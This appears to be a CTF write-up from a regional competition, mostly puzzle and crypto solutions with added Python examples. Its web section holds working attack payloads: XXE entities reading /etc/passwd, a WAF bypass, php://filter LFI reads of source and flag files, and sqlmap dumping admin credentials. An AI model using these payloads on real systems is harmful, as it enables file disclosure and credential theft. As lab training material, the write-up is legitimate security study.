CISCN Northeast Regional WP
For this competition I didn't look at the Web challenges; instead my girlfriend and I worked through quite a few of the crypto problems, even though most of them hardly count as cryptography. It was my last CTF in university, so having fun was what mattered. The writeups in italics below were done by a junior schoolmate.
MISC
Sign-in
The archive contains a QR code and a scanning tool; scanning it gives the flag directly.
sudoku
Solve the sudoku with z3; the diagonal from top-left to bottom-right is the archive password.
Vigenère
binwalk extracts b.txt; as the hint states, it is a Vigenère cipher. No key is given, so brute-force it; the key is faisnigslk and the plaintext is:
IhaveaDreambyMartinLutherKingJrDeliveredonthestepsattheLincolnMemorialinWashingtonDConAugustFivescoreyearsagoagreatAmericaninwhosesymbolicshadowwestandsignedtheEmancipationProclamationThismomentousdecreecameasagreatbeaconlightofhopetomillionsofNegroslaveswhohadbeensearedintheflamesofwitheringinjusticeItcameasajoyousdaybreaktoendthelongnightofcaptivityButonehundredyearslaterwemustfacethetragicfactthattheNegroisstillnotfreeOnehundredyearslaterthelifeoftheNegroisstillsadlycrippledbythemanaclesofsegregationandthechainsofdiscriminationOnehundredyearslatertheNegrolivesonalonelyislandofpovertyinthemidstofavastoceanofmaterialprosperityOnehundredyearslatertheNegroisstilllanguishinginthecornersofAmericansocietyandfindshimselfanexileinhisownlandSowehavecomeheretodaytodramatizeanappallingconditionInasensewehavecometoournationscapitaltocashacheckWhenthearchitectsofourrepublicwrotethemagnificentwordsoftheConstitutionandthedeclarationofIndependencetheyweresigningapromissorynotetowhicheveryAmericanwastofallheirThisnotewasapromisethatallmenwouldbeguaranteedtheinalienablerightsoflifelibertyandthepursuitofhappinessItisobvioustodaythatAmericahasdefaultedonthispromissorynoteinsofarashercitizensofcolorareconcernedInsteadofhonoringthissacredobligationAmericahasgiventheNegropeopleabadcheckwhichhascomebackmarkedinsufficientfundsButwerefusetobelievethatthebankofjusticeisbankruptWerefusetobelievethatthereareinsufficientfundsinthegreatvaultsofopportunityofthisnationSowehavecometocashthischeckacheckthatwillgiveusupondemandtherichesoffreedomandthesecurityofjusticeWehavealsocometothishallowedspottoremindAmericaofthefierceurgencyofnowThisisnotimetoengageintheluxuryofcoolingoffortotakethetranquilizingdrugofgradualismNowisthetimetorisefromthedarkanddesolatevalleyofsegregationtothesunlitpathofracialjusticeNowisthetimetoopenthedoorsofopportunitytoallofGodschildrenNowisthetimetoliftournationfromthequicksandsofracialinjusticetothesolidrockofbrotherhoodItwouldbefatalforthenationtooverlooktheurgencyofthem
omentandtounderestimatethedeterminationoftheNegroThisswelteringsummeroftheNegroslegitimatediscontentwillnotpassuntilthereisaninvigoratingautumnoffreedomandequalityNineteensixtythreeisnotanendbutabeginningThosewhohopethattheNegroneededtoblowoffsteamandwillnowbecontentwillhavearudeawakeningifthenationreturnstobusinessasusualTherewillbeneitherrestnortranquilityinAmericauntiltheNegroisgrantedhiscitizenshiprightsThewhirlwindsofrevoltwillcontinuetoshakethefoundationsofournationuntilthebrightdayofjusticeemergesButthereissomethingthatImustsaytomypeoplewhostandonthewarmthresholdwhichleadsintothepalaceofjusticeIntheprocessofgainingourrightfulplacewemustnotbeguiltyofwrongfuldeedsLetusnotseektosatisfyourthirstforfreedombydrinkingfromthecupofbitternessandhatredWemustforeverconductourstruggleonthehighplaneofdignityanddisciplineWemustnotallowourcreativeprotesttodegenerateintophysicalviolenceAgainandagainwemustrisetothemajesticheightsofmeetingphysicalforcewithsoulforceThemarvelousnewmilitancywhichhasengulfedtheNegrocommunitymustnotleadustodistrustofallwhitepeopleformanyofourwhitebrothersasevidencedbytheirpresenceheretodayhavecometorealizethattheirdestinyistiedupwithourdestinyandtheirfreedomisinextricablyboundtoourfreedomWecannotwalkaloneAndaswewalkwemustmakethepledgethatweshallmarchaheadWecannotturnbackTherearethosewhoareaskingthedevoteesofcivilrightsWhenwillyoubesatisfiedWecanneverbesatisfiedaslongasourbodiesheavywiththefatigueoftravelcannotgainlodginginthemotelsofthehighwaysandthehotelsofthecitiesWecannotbesatisfiedaslongastheNegrosbasicmobilityisfromasmallerghettotoalargeroneWecanneverbesatisfiedaslongasaNegroinMississippicannotvoteandaNegroinNewYorkbelieveshehasnothingforwhichtovoteNonowearenotsatisfiedandwewillnotbesatisfieduntiljusticerollsdownlikewatersandrighteousnesslikeamightystreamIamnotunmindfulthatsomeofyouhavecomehereoutofgreattrialsandtribulationsSomeofyouhavecomefreshfromnarrowcellsSomeofyouhavecomefromareaswhereyourquestforfreedomleftyoubatteredbythestormsofpersecu
tionandstaggeredbythewindsofpolicebrutalityYouhavebeentheveteransofcreativesufferingContinuetoworkwiththefaiththatunearnedsufferingisredemptiveGobacktoMississippigobacktoAlabamagobacktoGeorgiagobacktoLouisianagobacktotheslumsandghettosofournortherncitiesknowingthatsomehowthissituationcanandwillbechangedLetusnotwallowinthevalleyofdespairIsaytoyoutodaymyfriendsthatinspiteofthedifficultiesandfrustrationsofthemomentIstillhaveadreamItisadreamdeeplyrootedintheAmericandreamIhaveadreamthatonedaythisnationwillriseupandliveoutthetruemeaningofitscreedWeholdthesetruthstobeselfevidentthatallmenarecreatedequalIhaveadreamthatonedayontheredhillsofGeorgiathesonsofformerslavesandthesonsofformerslaveownerswillbeabletositdowntogetheratatableofbrotherhoodIhaveadreamthatonedayeventhestateofMississippiadesertstateswelteringwiththeheatofinjusticeandoppressionwillbetransformedintoanoasisoffreedomandjusticeIhaveadreamthatmyfourchildrenwillonedayliveinanationwheretheywillnotbejudgedbythecoloroftheirskinbutbythecontentoftheircharacterIhaveadreamtodayIhaveadreamthatonedaythestateofAlabamawhosegovernorslipsarepresentlydrippingwiththewordsofinterpositionandnullificationwillbetransformedintoasituationwherelittleblackboysandblackgirlswillbeabletojoinhandswithlittlewhiteboysandwhitegirlsandwalktogetherassistersandbrothersIhaveadreamtodayIhaveadreamthatonedayeveryvalleyshallbeexaltedeveryhillandmountainshallbemadelowtheroughplaceswillbemadeplainandthecrookedplaceswillbemadestraightandthegloryoftheLordshallberevealedandallfleshshallseeittogetherThisisourhopeThisisthefaithwithwhichIreturntotheSouthWiththisfaithwewillbeabletohewoutofthemountainofdespairastoneofhopeWiththisfaithwewillbeabletotransformthejanglingdiscordsofournationintoabeautifulsymphonyofbrotherhoodWiththisfaithwewillbeabletoworktogethertopraytogethertostruggletogethertogotojailtogethertostandupforfreedomtogetherknowingthatwewillbefreeonedayThiswillbethedaywhenallofGodschildrenwillbeabletosingwithanewmeaningMycountrytisoftheeSweetlandofli
bertyoftheeIsingLandwheremyfathersdiedLandofthepilgrimsprideFromeverymountainsideLetfreedomringAndifAmericaistobeagreatnationthismustbecometrueSoletfreedomringfromtheprodigioushilltopsofNewHampshireLetfreedomringfromthemightymountainsofNewYorkLetfreedomringfromtheheighteningAllegheniesofPennsylvaniaLetfreedomringfromthesnowcappedRockiesofColoradoLetfreedomringfromthecurvaceouspeaksofCaliforniaButnotonlythatletfreedomringfromStoneMountainofGeorgiaLetfreedomringfromLookoutMountainofTennesseeLetfreedomringfromeveryhillandeverymolehillofMississippiFromeverymountainsideletfreedomringWhenweletfreedomringwhenweletitringfromeveryvillageandeveryhamletfromeverystateandeverycitywewillbeabletospeedupthatdaywhenallofGodschildrenblackmenandwhitemenJewsandGentilesProtestantsandCatholicswillbeabletojoinhandsandsinginthewordsoftheoldNegrospiritualFreeatlastfreeatlastthankGodalmightywearefreeatlast
The plaintext is the "I Have a Dream" speech, which is not needed further; the md5 of the key is the flag.
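The writeup brute-forces the key, but the first words of the plaintext ("I have a dream by Martin Luther King Jr") are known, which turns this into a known-plaintext attack: key letter = ciphertext letter minus plaintext letter (mod 26), and the period of that keystream is the key length. The example below is added here and is not the writeup's script; the ciphertext is constructed by encrypting the opening of the recovered plaintext with the reported key faisnigslk, and the final md5 step is the one the writeup describes.

```python
import hashlib
from itertools import cycle

KEY = "faisnigslk"  # key reported in the writeup
# Opening of the plaintext recovered in the writeup; used to build the sample
# ciphertext and, in its first 31 letters, as the crib.
PLAINTEXT = ("IhaveaDreambyMartinLutherKingJrDeliveredonthestepsattheLincolnMemorial"
             "inWashingtonDConAugustFivescoreyearsagoagreatAmericaninwhosesymbolicshadow")
CRIB = "IhaveaDreambyMartinLutherKingJr"


def vigenere(text, key, decrypt=False):
    """Shift letters by the key; case is preserved and non-letters pass through
    without consuming a key character."""
    out = []
    ks = cycle(ord(k.lower()) - 97 for k in key)
    for ch in text:
        if not ch.isalpha():
            out.append(ch)
            continue
        base = 65 if ch.isupper() else 97
        shift = next(ks)
        if decrypt:
            shift = -shift
        out.append(chr((ord(ch) - base + shift) % 26 + base))
    return "".join(out)


def keystream_from_crib(ciphertext, crib):
    """Known-plaintext step: key_i = c_i - p_i (mod 26) for every crib letter."""
    ks = []
    for c, p in zip(ciphertext, crib):
        ks.append(chr((ord(c.lower()) - ord(p.lower())) % 26 + 97))
    return "".join(ks)


def period(ks):
    """Smallest p such that the keystream repeats every p letters."""
    for p in range(1, len(ks)):
        if all(ks[i] == ks[i + p] for i in range(len(ks) - p)):
            return p
    return len(ks)


def recover_key(ciphertext, crib):
    """Key = one period of the keystream derived from the crib."""
    ks = keystream_from_crib(ciphertext, crib)
    return ks[:period(ks)]


def flag_from_key(key):
    """The writeup's last step: the flag is md5(key)."""
    return hashlib.md5(key.encode()).hexdigest()


if __name__ == "__main__":
    ct = vigenere(PLAINTEXT, KEY)
    key = recover_key(ct, CRIB)
    print("key:", key)
    print("plaintext:", vigenere(ct, key, decrypt=True))
    print("flag:", flag_from_key(key))
```

A crib needs to be at least twice the key length for the period to be visible; with a shorter crib, fall back to index-of-coincidence or chi-squared scoring per column.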
huahua
The archive's local file header is corrupted; patch it to 504b0304 and it extracts to a PNG that is missing its signature. Prepend 89504e47; a CRC error then appears, and increasing the height reveals the flag.
flagpng
Brute-force the PNG width (the script below tries width and height together).
import struct
import sys
import zlib

from tqdm import tqdm

# Brute-force width and height at the same time. The IHDR CRC covers the chunk
# type "IHDR" plus the 13 data bytes, i.e. file offsets 12..28.
filename = sys.argv[1]  # path to the PNG
with open(filename, 'rb') as f:
    all_b = f.read()
data = bytearray(all_b[12:29])
# The stored CRC sits right after the IHDR data (offsets 29..32); in the
# original image it was 0x7D045233.
target_crc = struct.unpack('>I', all_b[29:33])[0]
n = 4095
for w in tqdm(range(n)):
    width = bytearray(struct.pack('>i', w))
    for h in range(n):
        height = bytearray(struct.pack('>i', h))
        for x in range(4):
            data[x + 4] = width[x]
            data[x + 8] = height[x]
        crc32result = zlib.crc32(data)
        if crc32result == target_crc:
            print("width: ", width, int.from_bytes(width, byteorder='big'))
            print("height:", height, int.from_bytes(height, byteorder='big'))
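Both huahua (missing signature, CRC error after changing the height) and flagpng (IHDR CRC left intact while the dimensions were edited) come down to the PNG chunk layout: signature, then chunks of length / type / data / CRC32 over type+data. The example below is added here and is not the writeup's code; it builds a small solid-colour PNG in memory (no image library needed), reports bad signatures and CRC mismatches, recovers edited dimensions from the stored IHDR CRC, and rewrites the height with a correct CRC the way the huahua step does.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def chunk(ctype, data):
    """Serialize one PNG chunk: length, type, data, CRC32 over type+data."""
    return (struct.pack(">I", len(data)) + ctype + data
            + struct.pack(">I", zlib.crc32(ctype + data)))


def make_png(width, height, rgb=(0xFF, 0x00, 0x00)):
    """Constructed sample: an 8-bit RGB PNG of one colour (filter type 0 per scanline)."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    raw = b"".join(b"\x00" + bytes(rgb) * width for _ in range(height))
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b"")


def iter_chunks(png):
    """Yield (type, data, stored_crc, computed_crc) for every chunk after the signature."""
    pos = 8
    while pos < len(png):
        (length,) = struct.unpack(">I", png[pos:pos + 4])
        ctype = png[pos + 4:pos + 8]
        data = png[pos + 8:pos + 8 + length]
        (stored,) = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        yield ctype, data, stored, zlib.crc32(ctype + data)
        pos += 12 + length


def check_png(png):
    """List the problems an image viewer would complain about: bad signature, CRC mismatches."""
    if png[:8] != PNG_SIG:
        return ["bad signature %s (expected 89504e470d0a1a0a)" % png[:8].hex()]
    problems = []
    for ctype, _, stored, computed in iter_chunks(png):
        if stored != computed:
            problems.append("%s CRC mismatch: stored %08x computed %08x"
                            % (ctype.decode(), stored, computed))
    return problems


def recover_dimensions(png, max_dim=4096):
    """flagpng trick: width/height were edited but the IHDR CRC was not, so search for
    the (width, height) pair that reproduces the stored CRC with the other 5 bytes fixed."""
    ctype, ihdr, stored, _ = next(iter_chunks(png))
    assert ctype == b"IHDR"
    tail = ihdr[8:]  # bit depth, colour type, compression, filter, interlace
    for w in range(1, max_dim + 1):
        prefix = b"IHDR" + struct.pack(">I", w)
        for h in range(1, max_dim + 1):
            if zlib.crc32(prefix + struct.pack(">I", h) + tail) == stored:
                return w, h
    return None


def set_dimensions(png, width, height):
    """huahua step: rewrite IHDR width/height and recompute its CRC. The IDAT data is
    left alone, so a taller height simply exposes rows a viewer previously cut off."""
    ihdr = struct.pack(">II", width, height) + png[24:29]
    return PNG_SIG + chunk(b"IHDR", ihdr) + png[33:]


if __name__ == "__main__":
    good = make_png(40, 30)
    print("intact:", check_png(good))
    tampered = good[:16] + struct.pack(">I", 8) + good[20:]   # width edited, CRC kept
    print("tampered:", check_png(tampered))
    print("recovered dimensions:", recover_dimensions(tampered, max_dim=64))
    print("taller image problems:", check_png(set_dimensions(good, 40, 60)))
```

With the full 4096x4096 search space the double loop runs about 16 million CRCs; when one dimension is trustworthy, fix it and search only the other.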
easy_rsa
import math

# ContinuedFractions, Arithmetic and RSAvulnerableKeyGenerator are the helper
# modules of the rsa-wiener-attack repository this solve was adapted from; the
# two arithmetic helpers are inlined below so the solve runs stand-alone.

def rational_to_contfrac(x, y):
    '''Partial quotients of the continued fraction of x/y'''
    a = x // y
    pquotients = [a]
    while a * y != x:
        x, y = y, x - a * y
        a = x // y
        pquotients.append(a)
    return pquotients

def convergents_from_contfrac(frac):
    '''Successive convergents k/d of a continued fraction, as (k, d) pairs'''
    h_prev, h = 0, 1
    d_prev, d = 1, 0
    convs = []
    for a in frac:
        h_prev, h = h, a * h + h_prev
        d_prev, d = d, a * d + d_prev
        convs.append((h, d))
    return convs

def is_perfect_square(n):
    '''Integer square root of n when n is a perfect square, else -1'''
    r = math.isqrt(n)
    return r if r * r == n else -1

def hack_RSA(e, n):
    '''
    Finds d knowing (e,n)
    applying the Wiener continued fraction attack
    (works when d < n^(1/4)/3, so that k/d is a convergent of e/n)
    '''
    frac = rational_to_contfrac(e, n)
    convergents = convergents_from_contfrac(frac)
    for (k, d) in convergents:
        # check if d is actually the key
        if k != 0 and (e * d - 1) % k == 0:
            phi = (e * d - 1) // k
            s = n - phi + 1
            # check if the equation x^2 - s*x + n = 0
            # has integer roots (they are p and q)
            discr = s * s - 4 * n
            if discr >= 0:
                t = is_perfect_square(discr)
                if t != -1 and (s + t) % 2 == 0:
                    print("Hacked!")
                    return d
    return None

# TEST function (needs RSAvulnerableKeyGenerator from the same repository)
def test_hack_RSA(times=3):
    import RSAvulnerableKeyGenerator
    print("Testing Wiener Attack")
    while times > 0:
        e, n, d = RSAvulnerableKeyGenerator.generateKeys(1024)
        print("(e,n) is (", e, ", ", n, ")")
        print("d = ", d)
        hacked_d = hack_RSA(e, n)
        if d == hacked_d:
            print("Hack WORKED!")
        else:
            print("Hack FAILED")
        print("d = ", d, ", hacked_d = ", hacked_d)
        print("-------------------------")
        times -= 1

if __name__ == "__main__":
    # test_hack_RSA()
    e = 932333292871340311536583425772799788581476608800501618257200913635688712797956595013312457091949241781390707236218326324287260096872275100972804737277188856396706341586791458364387568557914836880210799183882901779150174060503451992261799576875742788774243390310560719634789720219992974946820314802939572580353
    n = 1083178419603719448638799632475202672644727971741749926078568673467491721729891939162664192885208434541370193744078154888072589708037117486860213089624795029582525501783298026959443870222339003799747202112246474259375161019073230508249672271697738321500894559008261698558072028050806042318719109646040290668273
    c = 629671321698958970045785762020010033814849277886377341930329645318473402676175912514800812974363555981287129835454344489639514895119374277833430799149513068930055615330516662428479865724507981237582779353644800423513485357718723908554543915240117995464419165823214748496569735844685568687856495834900999682293
    d = hack_RSA(e, n)
    print('d=', d)
    m = pow(c, d, n)
    print('m=', m)
    # Convert the integer back to the ASCII plaintext (also handles odd-length hex)
    print(m.to_bytes((m.bit_length() + 7) // 8, 'big'))
crypto
superman
Open the image in 010 Editor: the file header has been tampered with. Change 88 to 89 and it opens as a Superman picture with the sentence iamback. At the end of the file there is something that looks like base64; decoding it gives an OpenSSL Salted__ blob, so off to CyberChef. Decrypting it reveals one more layer, and the password has not changed.
Sign me up
'''
Repeated base64 / base32 / base16 encoding:
decode layer by layer until the plaintext appears
BY-ZYA
'''
import base64
import re

basestring = b"U2FsdGVkX183lRElTLLADdk5IuMJH7LkLIyITIxXFSBsTbEI8TnmabzF6BTvpoRUHCSc7tprlyVqpBX8bCaN833NjMzk0yRXFJNlNBimahWrja++4RwE8/BllIrnHI6eFXk4ZcUEptAJV7OYJkLkdg=="
while True:
    base64_flag = 0
    try:
        basestring = basestring.decode("utf8")
    except UnicodeDecodeError:
        # No longer text (e.g. an OpenSSL "Salted__" blob): stop here
        print("binary output, not another text layer")
        break
    print(basestring + "\n")
    if '{' in basestring:
        break
    # base32 and base16 alphabets are upper-case only, so any lower-case
    # letter means this layer is base64
    for i in basestring:
        if i.islower():
            basestring = base64.b64decode(basestring)
            print("base64 decode:")
            base64_flag = 1
            break
    if base64_flag:
        continue
    elif re.match('^[G-Z]', basestring):
        # a leading G-Z cannot be hex, so treat it as base32
        print("base32 decode:")
        basestring = base64.b32decode(basestring)
        continue
    else:
        print("base16 decode:")
        basestring = base64.b16decode(basestring)
        continue
print("-" * 50 + "\nPlain text:", basestring)
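The "salted" blob the superman writeup hands to CyberChef, and the one the decoder above starts from, is the output of openssl enc: the 8-byte magic Salted__, an 8-byte salt, then the ciphertext. CyberChef's "Derive EVP key" is OpenSSL's EVP_BytesToKey, which chains hashes of password||salt until enough bytes exist for key and IV. The example below is added here and is not the writeup's code: it parses that layout, implements EVP_BytesToKey, and decrypts on the assumption that the cipher is aes-256-cbc and that pycryptodome is installed; the writeup does not state the password, so PASSWORD is a placeholder.

```python
import base64
import hashlib

# Blob from the "Sign me up" script above; after one base64 layer it starts
# with "Salted__", the magic of `openssl enc -a` output.
BLOB_B64 = ("U2FsdGVkX183lRElTLLADdk5IuMJH7LkLIyITIxXFSBsTbEI8TnmabzF6BTvpoRUHCSc7tprlyVqpBX8bCaN833NjMzk0yRXFJNl"
            "NBimahWrja++4RwE8/BllIrnHI6eFXk4ZcUEptAJV7OYJkLkdg==")
PASSWORD = "password"  # assumption: the writeup does not say which password it used


def decode_layer(b64):
    """Strip one base64 layer."""
    return base64.b64decode(b64)


def parse_salted(blob):
    """Split `openssl enc` output into (salt, ciphertext); None if the magic is absent."""
    if blob[:8] != b"Salted__":
        return None
    return blob[8:16], blob[16:]


def evp_bytes_to_key(password, salt, key_len, iv_len, digest="md5", count=1):
    """OpenSSL EVP_BytesToKey: D_1 = H(pw||salt), D_i = H(D_{i-1}||pw||salt), concatenated
    until key_len+iv_len bytes exist. MD5 is the default for OpenSSL < 1.1.0 and for
    CyberChef's "Derive EVP key"; OpenSSL 1.1.0+ defaults to SHA-256, and -pbkdf2
    switches to PBKDF2 entirely, so a wrong digest just yields garbage and bad padding."""
    if isinstance(password, str):
        password = password.encode()
    derived = b""
    prev = b""
    while len(derived) < key_len + iv_len:
        prev = prev + password + salt
        for _ in range(count):
            prev = hashlib.new(digest, prev).digest()
        derived += prev
    return derived[:key_len], derived[key_len:key_len + iv_len]


def decrypt_openssl(blob, password, digest="md5"):
    """Decrypt an `openssl enc -aes-256-cbc -a` blob (assumed cipher; needs pycryptodome)."""
    from Crypto.Cipher import AES  # assumption: pycryptodome is available
    parsed = parse_salted(blob)
    if parsed is None:
        raise ValueError("not an OpenSSL Salted__ blob")
    salt, ct = parsed
    key, iv = evp_bytes_to_key(password, salt, 32, 16, digest)
    pt = AES.new(key, AES.MODE_CBC, iv).decrypt(ct)
    pad = pt[-1]
    if not 1 <= pad <= 16 or pt[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: wrong password, cipher or digest?")
    return pt[:-pad]


if __name__ == "__main__":
    blob = decode_layer(BLOB_B64)
    salt, ct = parse_salted(blob)
    print("salt:", salt.hex(), "ciphertext bytes:", len(ct))
    key, iv = evp_bytes_to_key(PASSWORD, salt, 32, 16)
    print("key:", key.hex(), "iv:", iv.hex())
    try:
        print(decrypt_openssl(blob, PASSWORD))
    except (ImportError, ValueError) as exc:
        print("decryption not possible here:", exc)
```

When the result is still base64 or another Salted__ blob, as in the superman challenge, feed it back through decode_layer and decrypt_openssl with the same password.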
Caesar unicode
We see a pile of traditional Chinese characters and guess it is a Unicode offset. A brute-forcer shows that most offsets land on other CJK characters, so at first we assumed the target was traditional characters to be read as a message, but eyeballing thousands of candidates turned up nothing. Finally we tried shifting toward the English letter ranges and found the flag in the fullwidth block.
var strIn = "怦恺恮恫怦恗恴悁恴怵恲恾恼恴悂怳悃恷恴恬悄恽恀恲怿恳恴怽恪恵恀恐恶恀悂悊恂恲恂恱恇恂恁恁恇恆恰恄恄恆恇恱恂恄恀恀恵恲恳恆恃恇恅恵恃恴恵恈悌怵怴恞怲怲怴怵恟怰怲怮怮恣恠恡怴怱怵怳";
for (var offset = -25000; offset < -24000; offset++) {
    var strOut = "", nCode;
    for (var i = 0; i < strIn.length; i++) {
        nCode = strIn.charCodeAt(i);
        if (nCode == 13)        // \r
            strOut += "\r";     // keep line breaks and spaces as they are
        else if (nCode == 10)   // \n
            strOut += "\n";
        else if (nCode == 32)   // space
            strOut += " ";
        else
            strOut += String.fromCharCode(nCode + offset);
    }
    // Only print offsets whose output is printable ASCII or fullwidth ASCII
    // (U+FF01..U+FF5E); widen the offset range to reach the fullwidth block.
    if (/^[\x20-\x7e\uff01-\uff5e]+$/.test(strOut))
        console.log(offset, strOut);
}
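The catch the writeup ran into is that a shifted flag can land in the fullwidth block (U+FF01..U+FF5E), which looks nothing like ASCII to a byte-range filter. Unicode NFKC normalization folds those characters back to ASCII, so scoring candidates after folding catches both the ASCII and the fullwidth hit. The example below is added here and is not the writeup's code; the ciphertext is a constructed sample (a made-up flag shifted into the CJK block), and the "contains {" rule is a heuristic for flag-shaped output.

```python
import unicodedata

SAMPLE_FLAG = "flag{unicode_shift}"  # constructed sample secret
SAMPLE_OFFSET = 0x5F00                # constructed: moves ASCII into the CJK block


def shift(text, offset):
    """Shift every code point by offset; None if any result leaves the valid range."""
    out = []
    for ch in text:
        cp = ord(ch) + offset
        if not 0 <= cp <= 0x10FFFF or 0xD800 <= cp <= 0xDFFF:
            return None
        out.append(chr(cp))
    return "".join(out)


def looks_like_flag(text):
    """Printable ASCII after NFKC folding (fullwidth letters fold to ASCII), with a brace."""
    folded = unicodedata.normalize("NFKC", text)
    return all(0x20 <= ord(c) < 0x7F for c in folded) and "{" in folded


def find_offsets(ciphertext, lo, hi):
    """Try every offset in [lo, hi) and return (offset, folded text) for each hit."""
    hits = []
    for off in range(lo, hi):
        cand = shift(ciphertext, off)
        if cand is not None and looks_like_flag(cand):
            hits.append((off, unicodedata.normalize("NFKC", cand)))
    return hits


if __name__ == "__main__":
    ct = shift(SAMPLE_FLAG, SAMPLE_OFFSET)
    print("ciphertext:", ct)
    for off, text in find_offsets(ct, -0x6000, 0xA000):
        print("offset %+d -> %s" % (off, text))
```

Two offsets hit: the direct one back to ASCII and the one into the fullwidth block (0xFEE0 further up), which NFKC folds to the same string.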
ciphertext
jsfuck, then brainfuck, then Ook! -> flag.
re
signin
cat CrakeME.exe | grep 'flag'
WEB
flagin
Opening the challenge shows a login page. Submit arbitrary values and intercept the request with Burp Suite; the POST body shown in Burp's Proxy tab is:
<user>
<username>admin</username>
<password>admin</password>
</user>
Send a standard XXE payload straight at it:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<user><username>&xxe;</username><password>admin</password></user>
The request is blocked by the WAF, so the submitted content is being filtered; try to get around it. Some probing shows the filter matches on <?xml, so simply drop the XML declaration: a document without it is still well-formed XML and parses normally. After that the response echoes the contents of /etc/passwd:
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<user><username>&xxe;</username><password>admin</password></user>
Next, read the flag file. From experience, try /flag and /flag.txt. /flag gives no output, while /flag.txt returns a message saying the flag is being read the wrong way and to try another way. So read it through the php://filter wrapper instead, which returns the flag base64-encoded:
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/flag.txt" >]>
<user><username>&xxe;</username><password>admin</password></user>
Be Careful
Open the challenge at http://10.3.120.25/index.php?file= ; the file parameter is an LFI point, so start there.
First read index.php with php://filter/read=convert.base64-encode/resource=index.php; the source filters the input with stristr.
Scrolling to the bottom reveals a real_flag.php file; read it the same way with php://filter/read=convert.base64-encode/resource=real_flag.php.
It requires the value of a to equal 69563214562, yet a must not be that value.
So pass it in hexadecimal: http://10.3.120.25/real_flag.php?a=0x10324A6AE2 (0x10324A6AE2 is 69563214562 in decimal, so the numeric comparison holds while the literal string differs). Visiting that URL returns the flag.
Simple injection
The page shows a login form, which suggests SQL injection.
Run sqlmap on it and it dumps the admin user's username and password directly.
Log in with those credentials to get the flag.